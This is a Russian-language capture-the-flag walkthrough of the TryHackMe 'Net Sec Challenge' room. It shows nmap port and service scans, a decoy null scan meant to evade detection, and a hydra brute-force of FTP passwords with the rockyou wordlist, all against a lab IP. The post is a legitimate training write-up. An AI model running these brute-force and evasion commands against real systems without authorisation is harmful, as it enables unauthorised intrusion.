Пост

TryHackMe - Net Sec Challenge

Весёлый и информативный способ прокачать знания сетевой безопасности и навыки перечисления с помощью nmap

TryHackMe - Net Sec Challenge

Введение

Это challenge‑комната из модуля
https://tryhackme.com/module/network-security.

Этот модуль настоятельно рекомендуется к прохождению — он отлично подходит для знакомства с инструментом nmap и сетями в целом.

Tryhackme Room Link

Мы можем ответить на следующие вопросы, используя Nmap, Telnet и Hydra.

Какой самый высокий номер открытого порта меньше 10 000?

Для этой части нам нужен только базовый скан nmap.

1
nmap 10.10.82.60                                                                                           

Nmap

Ответ:

1
8080

Есть открытый порт вне стандартных 1000 портов; он выше 10 000. Какой это порт?

Добавляем -p-, чтобы nmap просканировал все порты.

1
nmap 10.10.82.60 -p-

All ports

Ответ:

1
10021

Сколько TCP‑портов открыто?

Можно просто посчитать TCP‑порты из предыдущего скана nmap.

Ответ:

1
6

Какой флаг скрыт в HTTP‑заголовке сервера?

Используем -sC, что эквивалентно --script=default, который:

  1. Проверяет уязвимости
  2. Получает баннеры сервисов
  3. Обнаруживает неправильные конфигурации

-sV пытается определить версии запущенных сервисов.

-p 80 — указываем конкретный порт, так как нас интересует HTTP‑заголовок, и скан выполняется быстрее.

Http Header

Ответ:

1
THM{CENSORED}

Какой флаг скрыт в SSH‑заголовке сервера?

Делаем тот же nmap, но с -p 22 вместо 80.

SSH

1
nmap 10.10.82.60 -sC -sV -p 22

Ответ:

1
THM{CENSORED}

У нас есть FTP‑сервер, слушающий нестандартный порт. Какая версия FTP‑сервера?

Указываем пятизначный порт, найденный ранее при сканировании с -p-.

1
nmap 10.10.82.60 -sC -sV -p 10021

SSH

Ответ:

1
vsftpd 3.0.5

Мы узнали два имени пользователей с помощью социальной инженерии: eddie и quinn. Какой флаг скрыт в одном из этих аккаунтов и доступен через FTP?

Теперь, когда у нас есть два имени пользователей, делаем следующее:

  1. Создаём файл со списком пользователей и добавляем eddie и quinn
  2. Используем hydra для брутфорса пароля с помощью словаря rockyou.txt
1
2
echo 'eddie' > users.txt && echo 'quinn' >> users.txt
hydra -L users.txt -P /usr/share/wordlists/rockyou.txt ftp://10.10.82.60:10021

Hydra

После этого подключаемся по ftp, используя найденные учётные данные и кастомный порт 10021, и находим флаг.

FTP Flag

Скачиваем файл и читаем его.

FTP Flag2

Ответ:

1
THM{CENSORED}

Переход по адресу http://10.10.82.60:8080 показывает небольшой челлендж, который выдаёт флаг после решения. Какой это флаг?

Задача — действовать как можно более незаметно, поэтому используем следующие флаги:

  1. -D — decoy‑скан, создаёт видимость, что скан идёт с нескольких IP‑адресов
  2. -sN — отправляет TCP‑пакеты без установленных флагов (без SYN, ACK, FIN и т.д.)
  • Если порт открыт — цель не отвечает
  • Если порт закрыт — цель отправляет RST‑ответ

⚠️ ОСТОРОЖНО: это НЕ работает против Windows, потому что Windows считает пакеты без флагов некорректными и отбрасывает их

1
nmap -D 10.10.0.1,10.10.0.2,10.14.99.72 -sN 10.10.82.60 

Undetected

Ответ:

1
THM{CENSORED}
Авторский пост защищен лицензией CC BY 4.0 .